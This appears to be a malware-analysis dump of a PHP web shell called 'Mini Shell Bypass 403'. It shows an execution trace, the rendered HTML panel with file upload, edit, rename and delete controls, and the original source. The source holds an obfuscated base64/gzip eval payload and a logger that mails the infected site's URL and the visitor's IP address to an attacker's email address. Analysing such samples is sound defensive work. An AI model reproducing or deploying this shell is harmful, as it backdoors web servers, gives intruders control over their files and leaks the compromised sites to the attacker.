3 23 0 0.001985 464000 is_writable 0 /var/www/html/uploads/byp.phtml(1) : eval()'d code 117 1 '/var/www/html/uploads/data'
3 23 1 0.002001 464040
3 23 R TRUE
3 24 0 0.002015 464000 filemtime 0 /var/www/html/uploads/byp.phtml(1) : eval()'d code 119 1 '/var/www/html/uploads/data'
3 24 1 0.002029 464040
3 24 R 1676253705
3 25 0 0.002042 463944 date 0 /var/www/html/uploads/byp.phtml(1) : eval()'d code 119 2 'd-M-Y H:i' 1676253705
3 25 1 0.002100 466336
3 25 R '12-Feb-2023 21:01'
3 26 0 0.002119 466072 is_dir 0 /var/www/html/uploads/byp.phtml(1) : eval()'d code 109 1 '/var/www/html/uploads/prepend.php'
3 26 1 0.002136 466120
3 26 R FALSE
3 27 0 0.002150 466064 is_file 0 /var/www/html/uploads/byp.phtml(1) : eval()'d code 123 1 '/var/www/html/uploads/.'
3 27 1 0.002165 466088
3 27 R FALSE
3 28 0 0.002178 466056 is_file 0 /var/www/html/uploads/byp.phtml(1) : eval()'d code 123 1 '/var/www/html/uploads/..'
3 28 1 0.002193 466104
3 28 R FALSE
3 29 0 0.002206 466064 is_file 0 /var/www/html/uploads/byp.phtml(1) : eval()'d code 123 1 '/var/www/html/uploads/.htaccess'
3 29 1 0.002221 466104
3 29 R TRUE
3 30 0 0.002234 466064 filesize 0 /var/www/html/uploads/byp.phtml(1) : eval()'d code 125 1 '/var/www/html/uploads/.htaccess'
3 30 1 0.002248 466104
3 30 R 64
2 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 125 $size = 0.0625
3 31 0 0.002273 466008 round 0 /var/www/html/uploads/byp.phtml(1) : eval()'d code 126 2 0.0625 3
3 31 1 0.002288 466080
3 31 R 0.063
2 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 126 $size = 0.063
2 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 130 $size = '0.063 KB'
3 32 0 0.002330 466104 is_writable 0 /var/www/html/uploads/byp.phtml(1) : eval()'d code 133 1 '/var/www/html/uploads/.htaccess'
3 32 1 0.002347 466144
3 32 R FALSE
3 33 0 0.002360 466104 is_readable 0 /var/www/html/uploads/byp.phtml(1) : eval()'d code 135 1 '/var/www/html/uploads/.htaccess'
3 33 1 0.002376 466144
3 33 R TRUE
3 34 0 0.002388 466104 perms 1 /var/www/html/uploads/byp.phtml(1) : eval()'d code 137 1 '/var/www/html/uploads/.htaccess'
4 35 0 0.002402 466104 fileperms 0 /var/www/html/uploads/byp.phtml(1) : eval()'d code 147 1 '/var/www/html/uploads/.htaccess'
4 35 1 0.002416 466144
4 35 R 33188
3 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 147 $perms = 33188
3 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 153 $info = '-'
3 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 165 $info .= 'r'
3 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 166 $info .= 'w'
3 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 167 $info .= '-'
3 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 168 $info .= 'r'
3 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 169 $info .= '-'
3 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 170 $info .= '-'
3 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 171 $info .= 'r'
3 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 172 $info .= '-'
3 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 173 $info .= '-'
3 34 1 0.002552 466144
3 34 R '-rw-r--r--'
3 36 0 0.002565 466104 is_writable 0 /var/www/html/uploads/byp.phtml(1) : eval()'d code 138 1 '/var/www/html/uploads/.htaccess'
3 36 1 0.002582 466144
3 36 R FALSE
3 37 0 0.002595 466104 is_readable 0 /var/www/html/uploads/byp.phtml(1) : eval()'d code 138 1 '/var/www/html/uploads/.htaccess'
3 37 1 0.002611 466144
3 37 R TRUE
3 38 0 0.002623 466104 filemtime 0 /var/www/html/uploads/byp.phtml(1) : eval()'d code 140 1 '/var/www/html/uploads/.htaccess'
3 38 1 0.002637 466144
3 38 R 1676253705
3 39 0 0.002650 466048 date 0 /var/www/html/uploads/byp.phtml(1) : eval()'d code 140 2 'd-M-Y H:i' 1676253705
3 39 1 0.002682 466376
3 39 R '12-Feb-2023 21:01'
3 40 0 0.002697 466104 is_file 0 /var/www/html/uploads/byp.phtml(1) : eval()'d code 123 1 '/var/www/html/uploads/byp.phtml'
3 40 1 0.002712 466144
3 40 R TRUE
3 41 0 0.002725 466104 filesize 0 /var/www/html/uploads/byp.phtml(1) : eval()'d code 125 1 '/var/www/html/uploads/byp.phtml'
3 41 1 0.002739 466144
3 41 R 3907
2 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 125 $size = 3.8154296875
3 42 0 0.002763 466008 round 0 /var/www/html/uploads/byp.phtml(1) : eval()'d code 126 2 3.8154296875 3
3 42 1 0.002778 466080
3 42 R 3.815
2 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 126 $size = 3.815
2 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 130 $size = '3.815 KB'
3 43 0 0.002815 466104 is_writable 0 /var/www/html/uploads/byp.phtml(1) : eval()'d code 133 1 '/var/www/html/uploads/byp.phtml'
3 43 1 0.002830 466144
3 43 R FALSE
3 44 0 0.002843 466104 is_readable 0 /var/www/html/uploads/byp.phtml(1) : eval()'d code 135 1 '/var/www/html/uploads/byp.phtml'
3 44 1 0.002858 466144
3 44 R TRUE
3 45 0 0.002871 466104 perms 1 /var/www/html/uploads/byp.phtml(1) : eval()'d code 137 1 '/var/www/html/uploads/byp.phtml'
4 46 0 0.002884 466104 fileperms 0 /var/www/html/uploads/byp.phtml(1) : eval()'d code 147 1 '/var/www/html/uploads/byp.phtml'
4 46 1 0.002898 466144
4 46 R 33204
3 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 147 $perms = 33204
3 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 153 $info = '-'
3 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 165 $info .= 'r'
3 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 166 $info .= 'w'
3 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 167 $info .= '-'
3 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 168 $info .= 'r'
3 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 169 $info .= 'w'
3 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 170 $info .= '-'
3 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 171 $info .= 'r'
3 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 172 $info .= '-'
3 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 173 $info .= '-'
3 45 1 0.003029 466144
3 45 R '-rw-rw-r--'
3 47 0 0.003043 466104 is_writable 0 /var/www/html/uploads/byp.phtml(1) : eval()'d code 138 1 '/var/www/html/uploads/byp.phtml'
3 47 1 0.003059 466144
3 47 R FALSE
3 48 0 0.003072 466104 is_readable 0 /var/www/html/uploads/byp.phtml(1) : eval()'d code 138 1 '/var/www/html/uploads/byp.phtml'
3 48 1 0.003086 466144
3 48 R TRUE
3 49 0 0.003099 466104 filemtime 0 /var/www/html/uploads/byp.phtml(1) : eval()'d code 140 1 '/var/www/html/uploads/byp.phtml'
3 49 1 0.003113 466144
3 49 R 1676253705
3 50 0 0.003125 466048 date 0 /var/www/html/uploads/byp.phtml(1) : eval()'d code 140 2 'd-M-Y H:i' 1676253705
3 50 1 0.003157 466376
3 50 R '12-Feb-2023 21:01'
3 51 0 0.003172 466104 is_file 0 /var/www/html/uploads/byp.phtml(1) : eval()'d code 123 1 '/var/www/html/uploads/data'
3 51 1 0.003186 466144
3 51 R FALSE
3 52 0 0.003199 466112 is_file 0 /var/www/html/uploads/byp.phtml(1) : eval()'d code 123 1 '/var/www/html/uploads/prepend.php'
3 52 1 0.003215 466160
3 52 R TRUE
3 53 0 0.003228 466120 filesize 0 /var/www/html/uploads/byp.phtml(1) : eval()'d code 125 1 '/var/www/html/uploads/prepend.php'
3 53 1 0.003242 466160
3 53 R 57
2 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 125 $size = 0.0556640625
3 54 0 0.003266 466016 round 0 /var/www/html/uploads/byp.phtml(1) : eval()'d code 126 2 0.0556640625 3
3 54 1 0.003280 466088
3 54 R 0.056
2 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 126 $size = 0.056
2 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 130 $size = '0.056 KB'
3 55 0 0.003316 466120 is_writable 0 /var/www/html/uploads/byp.phtml(1) : eval()'d code 133 1 '/var/www/html/uploads/prepend.php'
3 55 1 0.003333 466160
3 55 R FALSE
3 56 0 0.003346 466120 is_readable 0 /var/www/html/uploads/byp.phtml(1) : eval()'d code 135 1 '/var/www/html/uploads/prepend.php'
3 56 1 0.003361 466160
3 56 R TRUE
3 57 0 0.003374 466120 perms 1 /var/www/html/uploads/byp.phtml(1) : eval()'d code 137 1 '/var/www/html/uploads/prepend.php'
4 58 0 0.003388 466120 fileperms 0 /var/www/html/uploads/byp.phtml(1) : eval()'d code 147 1 '/var/www/html/uploads/prepend.php'
4 58 1 0.003402 466160
4 58 R 33261
3 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 147 $perms = 33261
3 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 153 $info = '-'
3 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 165 $info .= 'r'
3 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 166 $info .= 'w'
3 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 167 $info .= 'x'
3 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 168 $info .= 'r'
3 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 169 $info .= '-'
3 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 170 $info .= 'x'
3 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 171 $info .= 'r'
3 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 172 $info .= '-'
3 A /var/www/html/uploads/byp.phtml(1) : eval()'d code 173 $info .= 'x'
3 57 1 0.003527 466160
3 57 R '-rwxr-xr-x'
3 59 0 0.003540 466120 is_writable 0 /var/www/html/uploads/byp.phtml(1) : eval()'d code 138 1 '/var/www/html/uploads/prepend.php'
3 59 1 0.003557 466160
3 59 R FALSE
3 60 0 0.003570 466120 is_readable 0 /var/www/html/uploads/byp.phtml(1) : eval()'d code 138 1 '/var/www/html/uploads/prepend.php'
3 60 1 0.003586 466160
3 60 R TRUE
3 61 0 0.003599 466120 filemtime 0 /var/www/html/uploads/byp.phtml(1) : eval()'d code 140 1 '/var/www/html/uploads/prepend.php'
3 61 1 0.003613 466160
3 61 R 1676253705
3 62 0 0.003625 466056 date 0 /var/www/html/uploads/byp.phtml(1) : eval()'d code 140 2 'd-M-Y H:i' 1676253705
3 62 1 0.003657 466384
3 62 R '12-Feb-2023 21:01'
2 6 1 0.003678 466168
2 6 R NULL
1 3 1 0.003697 425688
0.003723 339040
TRACE END [2023-02-13 00:02:11.746159]
Generated HTML code
<html><head><link rel="stylesheet" href="https://pro.fontawesome.com/releases/v5.10.0/css/all.css" integrity="sha384-AYmEC3Yw5cVb3ZcuHtOA93w35dYTsvhLPVnYs9eStHfGJvOvKxVfELGroGkvsg+p" crossorigin="anonymous"><title>xXx Kelelawar Cyber Team xXx</title></head><body style="background-color:green;"><div style="color:red;margin-top:0;"><h1><center><font color="white"><b>[!] Mini Shell Bypass 403 [!]</b></font></center></h1></div><table width="90%" border="0" align="center" style="margin-top:-10px;"><tbody><tr><td><font style="font-size:13px;">Path Dir: <a style="font-size:13px;" href="?path="></a>/<a style="font-size:13px;" href="?path=/var">var</a>/<a style="font-size:13px;" href="?path=/var/www">www</a>/<a style="font-size:13px;" href="?path=/var/www/html">html</a>/<br>[ <a href="?">Homepage</a> ]</font></td><td align="center" width="20%"><form enctype="multipart/form-data" method="POST"><input type="file" name="file" style="color:white;margin-bottom:4px;"><input type="submit" value="Upload"></form></td></tr><tr><td colspan="2"></td></tr><tr><td></td></tr></tbody></table><div class="table-div"></div><font color="white"><b><input id="image" type="hidden"><br><center></center><div id="content"><table width="90%" border="0" cellpadding="3" cellspacing="1" align="center"><tbody><tr class="first"> <th><center>Name</center></th><th width="10%"><center>Size</center></th><th width="9%"><center>Permissions</center></th> <th width="10%"><center>Last Update</center></th><th width="10%"><center>Options</center></th></tr><tr><td>[File] <a href="?filesrc=/var/www/html/beneri.se_malware_analysis&path=/var/www/html">beneri.se_malware_analysis</a></td><td><center>0 KB</center></td><td><center>-rw-r--r--</center></td><td><center>12-Feb-2023 21:01</center></td><td><center><form method="POST" action="?option&path=/var/www/html"><select name="opt"><option value=""></option><option value="delete">Delete</option><option value="rename">Rename</option><option value="edit">Edit</option></select><input type="hidden" name="type" value="file"><input type="hidden" name="name" value="beneri.se_malware_analysis"><input type="hidden" name="path" value="/var/www/html/beneri.se_malware_analysis"><input type="submit" value="+"></form></center></td></tr><tr><td>[File] <a href="?filesrc=/var/www/html/byp.phtml&path=/var/www/html">byp.phtml</a></td><td><center>3.815 KB</center></td><td><center>-rw-rw-r--</center></td><td><center>12-Feb-2023 21:01</center></td><td><center><form method="POST" action="?option&path=/var/www/html"><select name="opt"><option value=""></option><option value="delete">Delete</option><option value="rename">Rename</option><option value="edit">Edit</option></select><input type="hidden" name="type" value="file"><input type="hidden" name="name" value="byp.phtml"><input type="hidden" name="path" value="/var/www/html/byp.phtml"><input type="submit" value="+"></form></center></td></tr></tbody></table></div></b></font></body></html>Original PHP code
<?=eval("?>".gzuncompress(base64_decode("eJzVWvtv2zgS/j1A/geGyFXOto7sxHlbKvpI07u2m+CSXVwvDgxZom2hsqQj6Ti52/7vN0NSTz/idHcPOAOpJWr4Def1DSm3+zodp5sbmxv2T5sbBD6fWMQib+Zx8u5xwDi5Yd5EP3n7mHpCkE5rn3xI+CAMAhYTm7yZyoS8h1mSkesxiyIYu/p4Rb54EaAweCSZLxMOw1/COBRKpMDa3PjJRv2Cyb4MJ6wfhZNQNlo7Z5sbjPOE9zlLEy7DeFQejBJzu7mxLWJvwoj+OIR2h0ksiZ9ECXdm41Aytztwb7fulHqzxJIt8IQCzna/P/KDkGcovYfDI0p21cVB7+GoA9/78H0E3x0zYThi0k/iI2EmHMLfCfz5OMdMPhgiUgGi7gHoEL+ZAT4oro/2Dbgor0ZkS8GZbS19iDNP1AOu5vBJv1+x4GgPJAK1YJQKtdg07oOT42+FmFKfafCNEahhQJWHwyFpgKn9iTcK/f6/polkoj9K/cbODvmPTo5hwpnnj0lju391eX1DPEG2v7FH4rhk+96LpiyXxI8WukWJO1iDkDxMReRBboiGET/T0t83N77jEpg/TojV3Xp/+e7m69U5GctJ5HbNv8wL3K4yibPIoUI+RgywmKRkzNnQoWMpU3Fq2ylPdjE7vBkTyYTt+snEhinME0zY9we77dZuy/aFsL0o2oVvSsJYshEP5SPAjr39407zzdfJ+bv9r7MD/9fB/j/96Ud5+eZkf7Z/EHy9Effjz1e/xl/FCbuWH4cXf7u/vP/08Ovw/PMFTy6+3YvRy5QSnydCJDwchbFDvTiJHyfJVFDb7cpQRsx9+MfDwjIk8KBra5mura0eJMEjUQY7A8//NuLJNA6aKvlPR5yx+My1znL3BeG9EaZahLPgbOJxWElTJulp64yCO9tu12dgN3ctyAlTXrsw3TbDoBxkbEBT4JgeoYAChuBfnN/cWqknx9ZdkRzbOABxrjw2AfbHkLK1ifDoO2GRYPMAukgbSgRyWY3rDEKeiDyfNWivR18RasM/6jnKqgssU/aQRkkAQpXHxj3SG0SMzMJAjh160voLJYOEB4w7tEWJF4UjiJd2Ac3cWHJes91KH9CBEjwkg8LvhpH0DAuvmyL8Nztt74O85V6hDe9Dfkqw2opC0kvGQgoDVUcwkLvUAHvLUHXiW68RxKFneZECbghuaJ0BKuk6iI2XL19W6lOh6wXcbodZqPCDsYaZW2pmZU6xKpuWJnzP67gQsFzE7tqeq0S/5wEYcPeWgFG6al9T9yNUaeqNGMqSu66NZkLmgXfBw/WQmMDtQeBccDmfEBb78jHFME0jGaYelzaONwNPepRMmBwngUORi2BGGKdTSbT8MIyAEDHxs+tK2ai2khXOIJEymZx2MPh2FUZMB9DMKFGU5tBfIPe8gBKQUuswltgqYVTSYNsSqQdG7dG52vrw18/n17cWrqdcXSjiJ+ljXeLWkpO0jzZYdybXsYptVdR1US22M58FVsYF5bZKlQOoqw0il5+28tBk0gNuKwNU8CvF/AQ0UBJ134bCI1OF/gR0OX3q3sQbLGlXEZ8PDUY4VI00YYAaCjMRCyETQuhwEGsdvLHa4dASfy4kO/Sg4H7ZeYvo5LhGJz5sQ1IvCGBf49B9fQ+R99V9u043uUUfQNspyazX5YSdewAtDGM4vyojSulZZXHKTXbZRwPYorkV5AbNIyTZg4TdnAcd1guSOHp0LMtFxdiCRcr80Iv8scehf5f2RYt8BLsMUGngiqjSgvXnXJykMkximE1evMj2Djho3SERWYHafFp191fsqnQ0g6C7jepsWqbiAcV0FV0O6OLKy1alTsrr1fIxmy0qqEyYZ6Eqr2O+RJ/EWq9I/660LSnSksE5Y89V67pVazRdeCMvWldZ9TY3WlmsOn7NC/OtpbQyRfpVWv+ZzcjPuKpTYgpds7oBzIodExJIHhooNpCcsSuB0GuC+CCDkwrRG64w2BjHhRBFxtX6TXU+pFs+XecKXdlXLpJST6mS7uIsZkEon8rhGqflERqmEJZhkrJ4LoGtmbVzNp/uwxlsoCHdh+kr8gT6ehl9DssnyISY1Lt/dlYrbTqn19VVvR36USKU/TvPzd6Cd3Fj4LRbLcKTmXD2DkyqgB+pIrWneLgcKcXCVpmFNf/9bzIak+9H8rlK7hmfz50VVrJ/idvX7TDOgg6TYWSSaEUmGnJrIelnx/P5WPxQDcCBwbx1WbhD+kMrwLzdQZUfPCi7tTWWsn2OjUo+U5vQxU7LXlY8x2uLvKUtUJzxPolZXsg/5qllHlL45/iC6gkFK89H1ezG4W3zNkidgNVlIz+7lqbhLhe3sVDzEgCQPladaJ+/Bc320MOQC4AnXTnOawubbOkNAT6B3YxR3VZnMvPwGrrsUsmTkuAV4xMoU6hMUZUny6A/e0KSX1I43625lktV+DV4tTnOfF96s6WDgCdy+J4jg61QqPqmKjQ2ytAd8ttvSlrl+a5Vvd21dqp5gYEL4yk7q/UGmm3/b6EG7/ITco/q832hsEdd/MLjcnZKzk1tNstWVp+VT+yaHPvYtDF7qvbUFry84sopn5U+egjPDz8Cq8rMqjsmhQwRVah1LcFQPHdBuqbnVkFXOBZaI2ZjgwbNL82v5ONpSF8RJLwJvu2uKcXDEX0CnZThK3uGnto09KBwfUxqTA/d114UWQIJ0hVAVr7ZB/ewNeOgljQduEdxyNZjc890N+xlrLdUTm9de9m5oJCz9Qoqe4Ce2TH0aLYwHO7RQqvK7tVTtL58yvY6c7RXijnlWqrO1LuUkuzLXuVdTiUHkEJodeuykEkwFRZSCT7I00O9g6on5QK22MYTDO7P8cANlzUAYpN2a6+zYIJ6b9xQd6/Ifr2ItJTrqNnzR4J5DKPoFdlTW03y5W25aBb31wxGf+OsT9VZS0kR226FFc37BqdkfLUG1NBClqTqlbdewaq6XoNmFgbtD2DMdXHXoUyNtbYxS0lz1Zr+PNY0Wtehzf9/1qzJ4TGqp0+nv5NZ0YvPpta1Ji3m1oVTfy+51o59+Y9T8Hg4jVVoTepryt3cyH9bwlHDmWWJ0lmxYYRekNbDu1artYP7t+yy/LtmGA8TgLLE/FuYMsabAuPNUoxoNcZxgXG8FKO5GuOwwDhcijFYjdEpMDpLMYLVGHsFxt5SDH81RrvAaC/FSJf/JJHLTGtvHPSDXaeqrtVGHa+JxS1yio7O8mWJeOtYi8/WFO8o8ergsVEpFMYDHJlPl0hcZ1qeUrP3PCPazzOidTxvROdJIzrPNaLVeZYRrb3nGdGeN2LPLFEuNSKTuKkbwZmc8lhrq/z4aeNv+fjbuvpPDVvNJjm//ECaTUVjr93/AvgdH9U="))); __halt_compiler();?>
<?php
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
set_time_limit(0);
ini_set('memory_limit', '64M');
header('Content-Type: text/html; charset=UTF-8');
$tujuanmail = 'galanghaxor10@gmail.com';
$x_path = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
$pesan_alert = "fix $x_path :p *IP Address : [ " . $_SERVER['REMOTE_ADDR'] . " ]";
mail($tujuanmail, "LOGGER", $pesan_alert, "[ " . $_SERVER['REMOTE_ADDR'] . " ]");
?>